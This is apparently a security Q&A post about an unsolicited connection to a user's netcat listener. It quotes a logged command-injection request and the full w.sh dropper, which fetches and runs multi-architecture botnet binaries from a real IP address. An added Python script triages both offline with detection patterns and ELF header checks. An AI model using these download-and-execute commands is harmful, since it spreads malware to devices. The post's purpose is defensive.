TLDR
Someone has connected to my netcat server and tried to execute a command. Is it possible they have done any harm to me/my computer/my network?
Detailed story
I've been learning about networking and sockets recently. As a programming exercise I created a simple TCP client and wanted to test it with a netcat server.
Everything worked as expected - my client had connected to the server correctly.
My friend asked me to send them the client app so they could have a look. In order for the app to work for them with my local server I had to set up port forwarding on my router. I always knew it could be dangerous, so I only wanted to set it up temporarily.
I started the server with a netcat command:
nc -lvp 8080
and the next thing I notice is that someone has connected to my server but it wasn't my friend!
In my netcat output I can see this:
Connection from 1.192.147.162:60185
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
/bin/busybox wget http://135.148.104.21/w.sh; chmod +x w.sh; ./w.sh%
You can see the Host as 192.168.0.14, but there's no such device on my network! However, I do understand the headers can be easily forged.
I have downloaded the w.sh to have a look at its contents - here they are:
wget http://135.148.104.21/bins/arm; chmod 777 arm; ./arm unidentified.arm
wget http://135.148.104.21/bins/arm5; chmod 777 arm5; ./arm5 unidentified.arm5
wget http://135.148.104.21/bins/arm6; chmod 777 arm6; ./arm6 unidentified.arm6
wget http://135.148.104.21/bins/arm7; chmod 777 arm7; ./arm7 unidentified.arm7
wget http://135.148.104.21/bins/mips; chmod 777 mips; ./mips unidentified.mips
wget http://135.148.104.21/bins/mipsel; chmod 777 mipsel; ./mipsel unidentified.mipsel
wget http://135.148.104.21/bins/x86; chmod 777 x86; ./x86 unidentified.x86
wget http://135.148.104.21/bins/i686; chmod 777 i686; ./i686 unidentified.i686
wget http://135.148.104.21/bins/i586; chmod 777 i586; ./i586 unidentified.i586
wget http://135.148.104.21/bins/arc; chmod 777 arc; ./arc unidentified.arc
wget http://135.148.104.21/bins/sh4; chmod 777 sh4; ./sh4 unidentified.sh4
rm $0
I have downloaded one of the above files, but it seems that they're binary, so I didn't know how to analyse them.
It definitely seems like the attacker from China (location of the IP) was trying to download a script, execute it and gather some info from my computer, and likely tried to connect my computer to the Mirai botnet (credits to the reddit user henrique_wavy for finding this).
However the question is: is it even possible with the netcat server I was running? Am I in danger here?
Of course I have disabled the port forwarding straight away...
I'm running macOS 12.6 and GNU netcat 0.7.1, if it matters.
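As an added example that is not part of the original question or answer, the Python script below triages the captured request and the dropper offline. It parses the raw request to show that the Host header is just a client-supplied string (which is why it names a device that is not on your network), flags the form body as a chained shell command rather than form fields, pulls the download URLs and target architectures out of w.sh, and identifies the architecture of a downloaded binary by reading its ELF header instead of running it. The request and dropper text are copied from the post; CRLF line endings in the raw request are an assumption, the Content-Length header is left out because the body shown is not the 227 bytes it claimed, and the ELF samples are constructed headers, not the real bins from 135.148.104.21.

```python
"""Offline triage of the captured request and the w.sh dropper from the post.

Added example, not code from the original post. It downloads and executes
nothing: the request and dropper text are copied from the post, and the
"binaries" it classifies are constructed ELF headers, not real samples.
"""
import re
import struct

# Copied from the post (CRLF line endings assumed; Content-Length omitted
# because the body shown in the post is shorter than the 227 bytes claimed).
RAW_REQUEST = (
    "POST /cgi-bin/ViewLog.asp HTTP/1.1\r\n"
    "Host: 192.168.0.14:80\r\n"
    "Connection: keep-alive\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Accept: */*\r\n"
    "User-Agent: python-requests/2.20.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "/bin/busybox wget http://135.148.104.21/w.sh; chmod +x w.sh; ./w.sh"
)

# The dropper script, copied from the post.
DROPPER = """wget http://135.148.104.21/bins/arm; chmod 777 arm; ./arm unidentified.arm
wget http://135.148.104.21/bins/arm5; chmod 777 arm5; ./arm5 unidentified.arm5
wget http://135.148.104.21/bins/arm6; chmod 777 arm6; ./arm6 unidentified.arm6
wget http://135.148.104.21/bins/arm7; chmod 777 arm7; ./arm7 unidentified.arm7
wget http://135.148.104.21/bins/mips; chmod 777 mips; ./mips unidentified.mips
wget http://135.148.104.21/bins/mipsel; chmod 777 mipsel; ./mipsel unidentified.mipsel
wget http://135.148.104.21/bins/x86; chmod 777 x86; ./x86 unidentified.x86
wget http://135.148.104.21/bins/i686; chmod 777 i686; ./i686 unidentified.i686
wget http://135.148.104.21/bins/i586; chmod 777 i586; ./i586 unidentified.i586
wget http://135.148.104.21/bins/arc; chmod 777 arc; ./arc unidentified.arc
wget http://135.148.104.21/bins/sh4; chmod 777 sh4; ./sh4 unidentified.sh4
rm $0
"""


def parse_request(raw):
    """Split a raw HTTP/1.x request into request line, headers and body.

    Every field, the Host header included, is whatever the client chose to
    send; nothing here is derived from the receiving machine."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


SHELL_META = re.compile(r"[;&|`$]")
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def looks_like_command_injection(body):
    """True when a form body chains shell commands and fetches something,
    i.e. it is a payload for a command-injection bug, not form fields."""
    fetches = any(t in body for t in ("wget ", "curl ", "busybox"))
    return bool(SHELL_META.search(body)) and fetches


def extract_iocs(text):
    """Return the URLs and hosts a shell payload references, sorted."""
    urls = sorted(set(URL_RE.findall(text)))
    hosts = sorted({re.sub(r"^https?://", "", u).split("/")[0] for u in urls})
    return {"urls": urls, "hosts": hosts}


def dropper_architectures(script):
    """List the architectures a multi-arch dropper tries one after another."""
    return [m.group(1) for m in
            (re.match(r"wget\s+\S+/bins/(\w+);", ln) for ln in script.splitlines())
            if m]


# Subset of e_machine values from the ELF specification.
ELF_MACHINES = {0x03: "x86", 0x08: "MIPS", 0x28: "ARM", 0x2A: "SuperH",
                0x3E: "x86-64", 0xB7: "AArch64"}


def identify_elf(blob):
    """Return (class, endianness, machine) from an ELF header, or None if the
    bytes are not an ELF file. Read-only: the file is never executed."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return None
    elf_class = {1: "ELF32", 2: "ELF64"}.get(blob[4], "unknown")
    little = blob[5] == 1                       # EI_DATA: 1 = LSB, 2 = MSB
    (e_machine,) = struct.unpack("<H" if little else ">H", blob[18:20])
    return (elf_class, "little" if little else "big",
            ELF_MACHINES.get(e_machine, "unknown (0x%x)" % e_machine))


# Constructed samples: the first 20 bytes of an ELF header (e_ident, e_type,
# e_machine) for a little-endian ARM and a big-endian MIPS binary.
SAMPLE_ARM_HEADER = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 0x28)
SAMPLE_MIPS_HEADER = b"\x7fELF" + bytes([1, 2, 1, 0]) + bytes(8) + struct.pack(">HH", 2, 0x08)

if __name__ == "__main__":
    req = parse_request(RAW_REQUEST)
    print("path:", req["path"], "| client-supplied Host:", req["headers"]["host"])
    print("body is a command-injection payload:", looks_like_command_injection(req["body"]))
    print("IOCs:", extract_iocs(req["body"] + "\n" + DROPPER))
    print("dropper targets:", dropper_architectures(DROPPER))
    for blob in (SAMPLE_ARM_HEADER, SAMPLE_MIPS_HEADER, b"#!/bin/sh\n"):
        print("sample:", identify_elf(blob))
```

The ELF check is the same kind of triage the `file` command does: it reads a header and never runs the binary, so it is safe to apply to an untrusted download, and the e_machine value tells you which of the dropper's targets a given file is built for. A listener started with plain `nc -l` only prints what arrives; the request body is data to it, not a command, unless the listener has been told to hand its input to a program (netcat's -e option does that).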
/cgi-bin/ViewLog.asp
to have it execute commands locally. Since the connection wasn't to an ASP web server (and therefore didn't have the vulnerability this was meant to exploit), you're probably ok. Other commands might have been executed that do exploit netcat, but it's a lot less likely. Use this experience as a lesson in how ubiquitous the bad actors are, and carry on. FYI 8080 is a popular "the other web server" port.